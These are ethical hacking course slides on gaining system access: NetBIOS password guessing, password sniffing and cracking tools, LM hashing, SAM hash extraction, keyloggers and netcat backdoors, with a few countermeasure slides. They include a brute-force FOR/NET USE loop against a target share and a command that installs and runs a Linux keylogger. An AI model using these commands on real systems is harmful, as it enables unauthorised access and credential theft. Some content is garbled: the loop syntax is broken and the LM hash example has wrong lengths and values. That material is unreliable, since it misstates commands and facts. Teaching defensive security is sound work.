Ethical Hacking

1
Ethical Hacking

• Phase III
• System Hacking Gaining access

2
Module Objective

• Understand the following
• Remote password guessing
• Password cracking
• Password sniffers
• keystroke loggers
• Remote control and backdoors
• Port re direction

3
Administrator Password Guessing

• Assuming that NetBIOS TCP139 port is open, the
  most effective method of breaking into NT/2000 is
  password guessing.
• Attempting to connect to an enumerated share
  (IPC, or C) and trying username/password.
• Default Admin, C, Systemdrive shares are good
  starting point.

4
Performing automated password guessing

• Performing automated password guessing is
  easy-simple loop using the NT/2000 shell for
  command based on the standard NET USE syntax.
• 1. Create a simple username and password file.
• 2. Pipe this file into FOR command
• C\gt FOR /F "token1, 2" i in
  (credentials.txt)
• do net use \\target\IPC i /u j

5
Tool Legion

• Legion automates the password guessing in NetBIOS
  sessions. Legion will scan multiple Class C IP
  address ranges for Windows shares and also offers
  a manual dictionary attack tool.

6
Password guessing Countermeasures

• Block access to TCP and UDP ports 135-139.
• Disable bindings to Wins client on any adapter.
• Use complex passwords
• Log failed logon attempts in Event viewer (audit)
  - Security log full event 529 or 539 -
  Logon/Logoff

7
Password Sniffing

• Password guessing is hard work. Why not just
  sniff credentials off the wire as users log in to
  a server and then replay them to gain access?

8
Hacking Tool LOphtcrack

• LC4 is a password auditing and recovery package
  distributed by _at_stake software. SMB packet
  capture listens to the local network segment and
  captures individual login sessions.
• With LOphtcrack password cracking engine anyone
  can sniff the wire for extended periods is most
  guaranteed to obtain Administrator status in
  matter of days.

9
Hacking Tool KerbCrack

• KerbCrack consists of two programs, kerbsniff and
  kerbcrack. The sniffer listens on the network and
  captures Windows 2000/XP Kerberos logins. The
  cracker can be used to find the passwords from
  the capture file using a bruteforce attack or a
  dictionary attack.

10
Types of Password Attacks

• Dictionary attack
• Brute force attack
• Hybrid attack
• Social engineering
• Shoulder surfing
• Dumpster diving

11
Password Types

• Passwords that contain only letters.
• Passwords that contain only numbers.
• Passwords that contain only special characters.
• Passwords that contain letters and numbers.
• Passwords that contain only letters and special
  characters.
• Passwords that contain only special characters
  and numbers.
• Passwords that contain letters, special
  characters and numbers.

12
What is LanManager Hash?

• Example Lets say your password is
  '123456qwerty'
• When this password is encrypted with LM
  algorithm, it is first converted to all
  uppercase '123456QWERTY'
• The password is padded with null (blank)
  characters to make it 14 character length
  '123456QWERTY_'
• Before encrypting this password, 14 character
  string is split into half '123456Q and WERTY_'
• Each string is individually encrypted and the
  results concatenated.
• '123456Q' 6BF11E04AFAB197F
• 'WERTY_' F1E9FFDCC75575B15
• The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15
• Note The first half of the hash contains
  alpha-numeric characters and it will take 24 hrs
  to crack by LOphtcrack and second half only takes
  60 seconds.

13
Manual Password Cracking Algorithm

• Find a valid user
• Create a list of possible passwords
• Rank the passwords from high probability to low
• Key in each password
• If the system allows you in - Success
• Else try till success

14
Automatic Password Cracking Algorithm

• Find a valid user
• Find encryption algorithm used
• Obtain encrypted passwords
• Create list of possible passwords
• Encrypt each word
• See if there is a match for each user ID
• Repeat steps 1 through 6

15
Password Cracking Countermeasures

• Enforce 7-12 character alpha-numeric passwords.
• Set the password change policy to 30 days.
• Physically isolate and protect the server.
• Use SYSKEY utility to store hashes on disk.
• Monitor the server logs for brute force attacks
  on user accounts.

16
Hacking tools cracking offline

• Pwdump first version which only works under
  Windows NT 4.0 but without SP2 (which introduced
  the cipher program syskey).
• It allow cracking offline a SAM

17
Hacking tools cracking offline

• Pwdump2 It already works with NT SP2 (syskey),
  and even with W2000 and XP.
• It's based on an attack called DLL injection,
  which needs an application running under an
  administrator account.
• This application is lsass.exe (sasser)
• It must be launched locally and as administrator.
• It could be used to detect weak passwords on my
  system -)

18
Hacking tools cracking offline

• Pwdump3e allow access to a remote SAM, but we
  need administrator privileges.
• It connects to admin, install the samdump.dll
  library and a service called pwservice.exe in the
  remote machine that will allow us to extract the
  hashes of the SAM.
• Always through SMB (TCP 139 y 445)
• Pwdump4 ,5 y 6.
• They can be obtained through Openwall (bringing
  security into open environments)
  http//www.openwall.com/passwords/microsoft-window
  s-nt-2000-xp-2003

19
Cracking NT/2000 passwords

• SAM file in Windows NT/2000 contains the
  usernames and encrypted passwords. The SAM file
  is located at systemroot\system32\config
  directory
• The file is locked when the OS is running.
• Therefor we must...

20
Cracking NT/2000 passwords

• Password offline reset Booting to an alternate
  OS (linux) installed on a diskette (or CD) and
  delete the password of the user administrator.
• We need physically access to the computer.
• Or extract the hashes from the SAM and use
  LOphtcrack to hash the passwords (we'll see it
  soon)

21
Hacking Tool John the Ripper

• It is a command line tool designed to crack both
  Unix and NT passwords. John is extremely fast and
  free
• The resulting passwords are case insensitive and
  may not represent the real mixed-case password.

22
Hacking Tool Cain Abel

• Tool which allow us
• Get the passwords from a local or remote SAM
• Get any password locally stored (IExplorer,
  Outlook, MSN, ...)
• Password sniffer.
• In switched networks it uses an ARP cache
  poisoning and a man-in-the-middle attack.
• It's also a wireless hacking tool.
• Lab 4 Using Cain Abel

23
Keystroke Loggers

• If all other attempts to sniff out domain
  privileges fail, then keystroke logger is the
  solution.
• Keystroke loggers are stealth software that sits
  between keyboard hardware and the operating
  system, so that they can record every key stroke.
• There are two types of keystroke loggers
• 1. Software based and
• 2. Hardware based.

24
Hacking Tool Hardware Key Logger
(www.keyghost.com)

• Hardware based Key Logger must be connected
  between the keyboard and the computer.

25
LKL Linux KeyLogger

• Lab 5 Using a keylogger
• Download from Sourceforge, or better,
• sudo apt-get install lkl
• sudo lkl -l -k /usr/share/lkl/keymaps/it_km -o
  log.file

26
Trojans and backdoors

• Another supertool Netcat
• Also called the swiss knife
• It can be used for many things
• Messenger
• Email
• FTP
• Scanner
• Remote shell
• Reverse remote shell avoiding firewalls.
• Lab 6 Using netcat